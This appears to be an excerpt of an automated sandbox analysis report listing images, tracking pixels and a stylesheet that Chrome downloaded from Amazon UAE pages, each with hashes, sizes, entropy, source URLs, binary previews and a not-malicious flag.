                                                                                                                                                                                                                                                                Entropy (8bit):7.885143961741562
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tu95NlWq9w4RbZluU6BUlTpUIFSK+6vzja:C95NIq9wOUU6OlXx+szW
                                                                                                                                                                                                                                                                MD5:5D696105C36B598568169C5C4B725C64
                                                                                                                                                                                                                                                                SHA1:0C7129A666167A62B944445F5C702952353A9303
                                                                                                                                                                                                                                                                SHA-256:241AF2152C537513CB097AA493D36E1D764011E35C28C5D35FA15B1B7530A7C2
                                                                                                                                                                                                                                                                SHA-512:0EE2CEAF6A6F5C79729A115F9F8D44FB6C4D7E8FBAD5407B109F6FED1E3FBCEBADB8EA3F63781AF71EAD3D788200DB9DB961A9F33938C6DF54550E8CA44A9841
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."Aa2Q.q..#%3brt.......s....BT.......................................................1!.."aq..Q..23AR.............?...R.%.)J.JR.R....(.)X.^l$G...\.."i.E.7....C......Pr..s.D.+\G. .$.\{oy.?...u..,....T,1.Snv..#<.Ac..A..Kw>h.u.2...C.F.......=C..H...i..)JP.JR.R....(.)J.JR.R..9..\....~'....Fn..un.W.~...P..Y-.U..J...m<...:jW........J.....Rv.69.?.......),q=.....~......:l.JFp2.`{...*...Kna.A...__..(U.Hoa...0%@p.1.~k......A........Ve..t.._..([vQ.JR..R......+.c#wo_S.\....)Z...s....[k{.ayd1.-...bQ:.>U..u..;_.F.?.*7..j.Z....14x.k.ob. ...5.o.._.^?.u=].5..'..#$a6............c.JU.2......$.H1...I;.........xr..r.#.:.......a.W:.3.+.m.-,R@...pU..qT....}M....k.pyK.F...3/.$.`G...!.[....dx......)...z6....~.Z][...eS.c....U".......,.\'.......7C.0@$z.Vu`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1888
                                                                                                                                                                                                                                                                Entropy (8bit):7.5917338157932415
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0kNw8jM2kM8or0g/qQEl8QwsSYdLtyBNDV9U1CQznX:TMAMy8sDZa8nKeBR4QQznX
                                                                                                                                                                                                                                                                MD5:4A63B2280F3E13B697E5F0391C9633F7
                                                                                                                                                                                                                                                                SHA1:DE3DCE1178A4C966D65763D5AAD0BDD07078D540
                                                                                                                                                                                                                                                                SHA-256:8984CB5A520E6CE7843C2FD8711FBE2D7081CDD31AA3BA1A4E512D9C973618EE
                                                                                                                                                                                                                                                                SHA-512:47BBAE2F375554915173CD7E3498885720655766C9736D2189B49CC92069B295CC86D87170455ACF4171F41E83E302812F48C1961F95CC8937B5CC892A13C127
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........2................................................................v..........#I%;.[.KzQ#....j..[T..@....2..%..kX........zR(.......ZmQ:...5}+.......N....d.^y7..';.}..7.z9..B.sgO.9...].}...[...N@...B..+..........;.hy..F...41H......?A. .S.b>".*...UZ.V>.*.X..[.?n.0.. ...................?...@..........................!AQ..."12R.....0a...Bq.....#S`b$3r..........?....X.3.N\.h.I01.8..........?.y.x.A.e..O.?..W.i..y.\ I...?/.....[SN.i.hB........Z.q.....2D...I.p1...>A.d.o..hV=....<.J...I.&.p.."..9u:.}.$...W...u.RB.H.!Z...|.)Zd1.-.P7.'.........._@..,;...V..t..t+Xr..(...JA.4o2.o..v`..Yqv.7S..~..6R.b."..r.(J.\...bDa.+TI.N.2....2...-..^;.!iA..(..E.I....U......\B..\...x.o.....}Hum)Z.+._.....Ah.2Nu$\C.T..&..i[.?..M.`8..$....I6H......u..@>&%.j..X...W....N.@J....-R......... ......>....6RS..-..PR..@..)...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):141607
                                                                                                                                                                                                                                                                Entropy (8bit):7.921386753935607
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:RA48loGc0kcoD6Od+3KC9apV58IOnu3Vj3z7t3SV7kRRuM+:RA9Vc0kcoD6U+3+V58ZnO3/t3SVARuM+
                                                                                                                                                                                                                                                                MD5:2311302CE6661577DF4BAD4418032BAA
                                                                                                                                                                                                                                                                SHA1:96470C1635A7CE5580C08E3308D5BF9E9F6D1E01
                                                                                                                                                                                                                                                                SHA-256:5C1F8B2D13ECB99261BC9DB377868B7D6CA994766A5E208E74BE5F09305419F2
                                                                                                                                                                                                                                                                SHA-512:2995D9E09EF2AF1E66D90E734D521491BEE2B9FA20A409191FFAF38704797DF6D93F5BC980DBE3748694D768CF8F8A642E8E9D28466DD00818E20C2F77A82177
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......#.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:2C8E13E14B5811EF8C44DC556605C1E6" xmpMM:DocumentID="xmp.did:2C8E13E24B5811EF8C44DC556605C1E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C8E13DF4B5811EF8C44DC556605C1E6" stRef:documentID="xmp.did:2C8E13E04B5811EF8C44DC556605C1E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............z"..'...)%........................................... # ..))--))=;;;=@@@@@@@@@@......................!.....!
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11379
                                                                                                                                                                                                                                                                Entropy (8bit):7.924209891616291
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Gp7y0ZLd+9Sdkt1zNsiU95nF5w1oCWIkIKXikRRZYzZTGyiOEV0dlyWD7u:GsCduR1N1U99bIoVHjtHYNTGDOEV0/bu
                                                                                                                                                                                                                                                                MD5:060B4BC0A50DCA57A7E555AB72B11488
                                                                                                                                                                                                                                                                SHA1:413E13EC631C7CA9E1C41AF2D6BD5E6FEC182D8A
                                                                                                                                                                                                                                                                SHA-256:6B800B56F4BA91D49BE666F8EC72C52F3BF8D54A03BEC205B2B1DA069787A2DF
                                                                                                                                                                                                                                                                SHA-512:75C16A7AB6F0EB9FFE56C043222042DB746CCA945FC50DE702659AFE806A12266209C539BA06BEC0043582AB8BB73FDE01D13D4E3445767E2925808E5F5EFDEE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71UEeKk60LL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................,....K.h...\F..:...K.Q...\...e@.4.w.V...>ey..&......`..2zg=.>a..f..a.2.0..._...........z'0..+u..r.^..q..=..._.......k....he.jk..I.uL...Z...7..8.........R..]+y..g..=..Oc...............u.Y.lu......M..\.qc[.<......g1..KG.]....Z>M.}....'b...k.1.m..#M.5.}.T..Z......)..L...;q.........k.r.Vp.=..5.....b.r.T.../}....Z...cN......Z.kR5Lv..`e...\..R.y.mx.s..u.g,.3yS.xr....e..9.wn.S.......P....r.Z>....j.O..MGm.2...<.5~..m..w.P....9j.LF....m.n..m.Z..........oR.......y..vE.........(q...u..G..sc.s......:.<.....=..[T.......c/g.Z.\..y.....|.l.j]?..e|..c..$.:.nx.e.zyf;.....Aq............{.q.]kFP......r....9.{._>.3....\~b...^R.j..7B..}f..i|..~..w+Y..$W..../.1....x.............N5.o=.7..`3>.U.=.S....u.Vr....<.kZ]U.*.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9591
                                                                                                                                                                                                                                                                Entropy (8bit):7.791668137482852
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:/IGUPl6CovaQQNZlhQyxizYvTTYrFWte8cm40RcIyl:h2kCNhhQyxiqTXttcz0RAl
                                                                                                                                                                                                                                                                MD5:9694FA621269745568E3AB6F02A4A083
                                                                                                                                                                                                                                                                SHA1:5BA67E691993DE36B59608FA8DC746BF8295DAAF
                                                                                                                                                                                                                                                                SHA-256:8F392C334F612DA0FEF6412B65AD989F857F75DCEF10DA6354F59F1EA5E1517D
                                                                                                                                                                                                                                                                SHA-512:B90FB02ECCFEF5EABDA09D22682612A378CE1451F5BE53291A48FD21A5F7EE7531EA2A994699B3D275C583F75B2839C0A7E289A9EA4253EB59C9C4418F75C6FE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31aozKg0dqL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2..................................................................................................X.2.[..H..%E..f......................x.U.7....Te.b..a.........3..4....................;3ZY.+l.w..=..:.I.`r.S.W......................n.....e..?,.:7..IVn..+N...fa/Q.S..o/=.................4...X.LZ...M..0+f....U.m.....Y..Rc^......................k:...."..f.,.k....3 -=G.E..h................+5..jZ.+..u....J..0...&K.,....0u.t.................9.y_Y...Ro.zy2D.....Dp..A.....f................#....;o0...Md.BN..q..#&.......s..................Hi..Wt.S...H....T^.j(...!..P.O.}..wv4.............?0.kjl...^.F..fO.N..e.q...5....P.:.=.5.N.Y`...-......'...5i.n.w"..............$T.m-.Xm........uU`.....i}!.....cq.|Xu.....r.\.m.v.V..h...............)a.[Ot.]......^..Om...v.....s.]h..^1.z.YY.E..s.............
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3095
                                                                                                                                                                                                                                                                Entropy (8bit):7.769203667509138
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:W20DAY47LALVCGTXcpTJxYEe9PJj4jvLgHA1:W20DvdHMpTJv6Jj4jzgHA1
                                                                                                                                                                                                                                                                MD5:9EC6CC12F6B0FF0FB05D2B355EF68C35
                                                                                                                                                                                                                                                                SHA1:29D6B7A4584DDBB7BBD687FFAAEF44568AA52F56
                                                                                                                                                                                                                                                                SHA-256:C36677AFDFEB29C9EE213C148973DA50589D05FFBAB7749517F6ED250D7E9AE3
                                                                                                                                                                                                                                                                SHA-512:5F34FA2F602789E866E3B366905D436C40700311524DE34D05FC6F840438885207E669DDF891DE233D04389736FE8FB0D67969CB6FB4162CE669B66314A79180
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........2.....................................................................N..$..............,1....s.B}i........u.U..z..P|..i..q^9r.M...4........MI.......x..f....^|.2w]2.[qm@d.....V.j+.#og...e..<...".T.O......>:.?<?..w..b....{...Af`[....>.....s.+.1@..".Nx........_%N..G.j.x:..xzH..O....Z...............-............................@..!0....# "'7P.............a.Q.....t.L.U....D..]\..8..F.L.>.....S&......#-'.M^N...N'>...t.[L7S:3Fo.5g`....Mn/b.--..w..r..h..3H.6..s.[.1....]"&...2s...8..XsK.0.^v.....o.o..F4....;.*..n.."..U.@y...Hr.B.......!..Z.o..NS..a#pG?..llwU.B'<....'L..Z..1r....e!V0$.c..lW8.G.m.n&.......7.!...0....J.?W..L%M.....G.U.=.z.W...HE.`.2O.....#..Q.t...W.A?..IQt...=.H.........'{...]]......a.Ol.J..&.....L....T...u.Jj..Z..I...P.#h9n*..5.....\b.....(..M7'.7rK.A./,(4......s.#.~.t
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (31984)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):45742
                                                                                                                                                                                                                                                                Entropy (8bit):4.909387085085345
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:uMt4cIFBUCdbt/liBz+z7zGHYYjyUHtZAUUwfDG2dd5usOzS9OukJf5CkiPXTA:LHiBUCdbNliBwwUwRZxL4uGf5CtPE
                                                                                                                                                                                                                                                                MD5:A6A89A292874545564608D1C25E0B28D
                                                                                                                                                                                                                                                                SHA1:2921537FBC8039340A922B43B5DDC6FD9A1AC691
                                                                                                                                                                                                                                                                SHA-256:B4FACBA684AB6A47772B5ECFB183483FC9061BB964B2948FD6578A8B1A54525B
                                                                                                                                                                                                                                                                SHA-512:BA6F2D4F89A3D5FBBF4B091D2295F2609C11247E2573141901E5D0A657FC8E198CD1A9DA60C87C30DBA6A9AFB322607BF1A15E5F1A268D82E7AC4A0E47B7ECAE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/31fQkkruJsL._RC%7C41myxhOUctL.css,01vF6gFybxL.css_.css?AUIClients/SharedShoppingCartDesktopAsset"
                                                                                                                                                                                                                                                                Preview:.sc-batch-glow-icon{display:inline-block;vertical-align:text-bottom}#sc-buy-box:not(.sc-card-style) .sc-sss-spinner{position:absolute;margin:auto;top:0;bottom:0;left:0;right:0}.sc-cart-overwrap{position:absolute;height:100%;width:100%;background-color:#FDFDFD;z-index:109;left:0}.sc-cart-spinner{text-align:center;width:100%;top:50%;z-index:110}.a-no-js .sc-invisible-when-no-js{display:none}.sc-hidden{display:none}.sc-white-space-nowrap{white-space:nowrap}.a-button-close.sc-close-button{top:25px;right:15px}.sc-link-disabled{color:#888!important;cursor:default!important;text-decoration:none!important}.sc-checkbox-no-js{height:auto!important}.amazon-delivered-icon{vertical-align:-webkit-baseline-middle}.sc-background-dark{background-color:#EAEDED!important}.sc-card-spacing-top-none{margin-top:0!important}.sc-price-sign.a-size-small .currencyINR{background-position:0 -318px;height:9px;line-height:9px;margin-bottom:1px;width:6px}.sc-price-sign.a-size-base .currencyINR{background-position:0 -
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D16650%26at%3D16650%26t%3D1723469060972%26csmtags%3DendVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16650
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8552
                                                                                                                                                                                                                                                                Entropy (8bit):7.836219212963423
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:WWB4YHuf//BGE4Eb6osoZR77m8ZQ46Q+CkODl5B0X/:v+YHuXF6osS97HZQ9QwsnB0v
                                                                                                                                                                                                                                                                MD5:F624BB6683A28BA068F17CC982FE318D
                                                                                                                                                                                                                                                                SHA1:BB113F823C519DEC019F106ADE3338F6CD034349
                                                                                                                                                                                                                                                                SHA-256:9AE1F9AFC6B3BE1810CC7C5971D800FE1D39D18512D729E9829C2319E55B092C
                                                                                                                                                                                                                                                                SHA-512:53B80DAD33011242781820EC4D76083134CA2EB11BC7BBE3A4AB50E223824EFEAD626A0D58C5FF6D3B87005CA553A7094FAB9FCB26066C4BB2CB356828346E8E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/AE_HSBC_BTS_AUG_GW_DC_758x608_EN._SY304_CB568253382_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......0.{.."..........6..............................................................................................................f..k.f..k.f..k.f..k.f..k.f..k.f..........9ZT.........`.2........9ZT5.".z.O.....]..l....xw..t.....g.l/.qHF..e.M.....m.....&...d.%...9..........r...B]e..y..7...|..\i3Lt\..._R.O(...m...E0.....c=)..k....t..>.X..9.(.......3..F.9.<..#.~..-.o..T...@}.j..@..w..#.:.=...y.Y./=-_H.Z...0e........r...~.7-.4....a'....8.Sb....C.....)`.<...........V.....2ln...+.*.3..~....6.&..X..................v..1.........P....%......Lq.|sF..p$1#K1...m.i.a,..d"X<...........T..........<................\-...\-...\-...\-...\-...\-.............'I.L.........av-..............4..s..u......y..+.v..XW......3)......#.......).G.A5...}.6.6.&d...........~..&/a.........>..]9...2...........m......u.=a........4.Jw.A...i
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):144274
                                                                                                                                                                                                                                                                Entropy (8bit):7.735030497100166
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:4HuLo+k6ONuRKXRMVvo95/L7yaZJWdKb/ivUJF6Pw41DNp6FCoC:EuLo+k6VqavU5T7y4n/NjcwY6Fe
                                                                                                                                                                                                                                                                MD5:82A69B829D3E935D11D849075F6C39A9
                                                                                                                                                                                                                                                                SHA1:FCBDE75E4547C6A72B7EFDEFF104314CA2149259
                                                                                                                                                                                                                                                                SHA-256:7EE6B7453552B8CBB749E172224344DF1FF248EAA7146C8AC99B89AF624BA62D
                                                                                                                                                                                                                                                                SHA-512:9270B5CB3FE40154458A965EB37F5EBAFC96E200F1D7FFF1BF6067DC29D191844A2105E0B0758946C67A176B23A339839B0B7FFE150BBA8023EAF546B9D4D6B7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71+TeUnEtaL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4538
                                                                                                                                                                                                                                                                Entropy (8bit):7.479926084993934
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TAYSlh0R4pbb2y4f3y8VVBB20UrFjivJEvBRxk9whi8gIFHB8nyhI8:8YrR82y4f3FzBdUrxblk8gS8nyhI8
                                                                                                                                                                                                                                                                MD5:7DF5507CF40C144EC38FC15063F6D9E3
                                                                                                                                                                                                                                                                SHA1:9EC51EB6A3B8574A00C7F9BC7BE5ED71F47317FC
                                                                                                                                                                                                                                                                SHA-256:8B1BDA6979D26A784CE28A25F0324DCD16308AAB7389969E014662BAF8AB38A2
                                                                                                                                                                                                                                                                SHA-512:8DF67D791816AD55980DAFC3A1EE6583F576F5125FE63110E4B795674881F7AF8672C33EF744CDD45BECB07C4E6C75238555AAC3EBE2A9ACB5829E40C0DE1945
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/41Egkilho1L._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................`.....n^.F... ..........................c.z.lh......................B.b.W..^7..E........................f.U...6...].........................O^._YQ-'........................r.[.N...MG.r..,.....................G..h.K>.'foD.......................3.=W,.+..%............................V3.m{../........................x..W*.g.[.s......................9...... *:v..........................F.R6U.G.r..G0....................@......gm^.t_......................n.c....t...;!v ....................]Um.........|..d....................9H&..p....H..`.Z.a)..%....................6._..=:I.;..\......X...5.S......................$S=..]L....V>d.2..V....N....................i7b.O..:.L....1NH...]@....................0s.U..4.{..Wx........&.............
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3157
                                                                                                                                                                                                                                                                Entropy (8bit):7.875151339724645
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rmtUzK7eeI6ahxS5ZCe1elrPbc9Gpzme4eS1HFiPnKB+XZrpzTnLpD+Np0MAQ:TDUz/4CieR1girNT1DGmMA11Rm
                                                                                                                                                                                                                                                                MD5:8A8F97EE467B7450693CF229FE06C7A9
                                                                                                                                                                                                                                                                SHA1:DA7E40F0F24141E573095072F2CC778901DFF45D
                                                                                                                                                                                                                                                                SHA-256:E23AB0277A10A719139E16D976900C795F80AB34BE28F632F6530099E821E277
                                                                                                                                                                                                                                                                SHA-512:119505C239A8645AEC99590210FC7A296B8C1B9F889C80658EA5BDCA8F5DD0186D6DE44F9677E7C658B0979B91ED4C6603A4B10EF28D1E9865499320CAF4CBF6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1A.Qaq...."2..Rr.....$3s....BS#%CTbc................................................1...!A."2..............?...*.I..........Ts.=.C...i.n....h...{y.#..5\.1.,....4M.w.....e.....i...Gq./`.....5.P...4....H>".kwN*G..`..........A....f...5..`...5.....J.J..n(.t.;...o.S.F>y...7..k.G.@P6.Q.._.H...l|4..C}...}.j....%.G.....'..O...[c..zD....B.frOge..y...."f(.A..j./.......s.wTe..j.j..UdmjY..+..(..m.7.N......M...QOi.......<dw.G..4{..b..!e..G....g..}...#..{q".3.T..W..8....Gq_.(.H.S.=..N .G...e.....QKk..GQ..8i:.#l6.XZk....SB,0......x...O....M.........G.e.._z....\....j.G..../b....>Y.\M.......~t.........3TY..|y"TZ..A.a....{)..%....^.....t..I......C|R.=..n'=...d<Px.?1Ze1.*y......iP....H[Z..u....?..Iv..'7.4.m....V...].v.S....2.. .=..Uc..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4119
                                                                                                                                                                                                                                                                Entropy (8bit):7.888677027917507
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TxXslZ1uqS4BG2/slaK63PDuMV/LyqNySHRAa5CpW50:izEiD/ZKwrus/LvrHF8WW
                                                                                                                                                                                                                                                                MD5:DCF43FDB604979CCA05427CC32DC2850
                                                                                                                                                                                                                                                                SHA1:FB4934945EF5D284A69A193E975B7661D127B8EA
